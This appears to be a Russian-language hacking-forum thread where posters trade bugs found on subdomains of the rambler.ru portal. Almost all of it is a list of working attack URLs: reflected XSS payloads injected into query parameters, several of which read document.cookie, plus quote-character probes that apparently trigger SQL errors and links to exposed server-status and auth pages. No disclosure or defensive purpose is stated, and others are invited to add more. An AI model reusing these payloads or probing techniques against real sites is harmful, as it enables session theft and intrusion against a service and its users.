Решил потратить немного времени на поиск багов на rambler.ru, результат не заставил себя ждать, если у кого-то ещё что-то есть выкладывайте [XSS] http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert('XSS')%3C/script%3E http://olymp2006.rambler.ru/winners.html?day=http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert(/XSS/)%3C/script%3E http://www.rambler.ru/db/sport/news.html?d=%3Cscript%3Ealert('XSS')%3C/script%3E http://adstat.rambler.ru/wrds/?date=0601&words=%3Cscript%3Ealert('XSS')%3C/script%3E [Ошибки] http://nakarte.rambler.ru/samara/?query=4%27&x=15&y=4' http://topshop.rambler.ru/click.html?id=4'
старенькое... уже выкладывал гдето, но пусть будет всё в одной теме... http://finance.rambler.ru/db/chain.html?type=fix&chain_id=<script>alert(document.cookie)</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words="><script>alert(document.cookie)</script>&ftype=5&form=0&hu=1&what=0 http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script> http://www.rambler.ru/db/news/news.html?s=5&detail="><script>alert(document.cookie)</script> тоже интересно http://info.rambler.ru/db/auth/ http://info.rambler.ru/server-status http://info.rambler.ru:8100/server-status
Это вроде как новое, а может я просто не все топы смотрел =) Вот что до этого находил http://antisec.2x4.ru/advisories/rambler.txt
http://horoscopes.rambler.ru/day.html?day=1rat"><script>alert(1)</script>&month=4&year=1965&gender=f http://www.rambler.ru/db/sport/msg.html?mid=7936188rat"><script>alert('Rat inside!')</script> http://foto.rambler.ru/srch?control_charset="><script>alert('Rat%20inside')</script> http://planeta.rambler.ru/search.html?sort="><script>alert(1)</script>
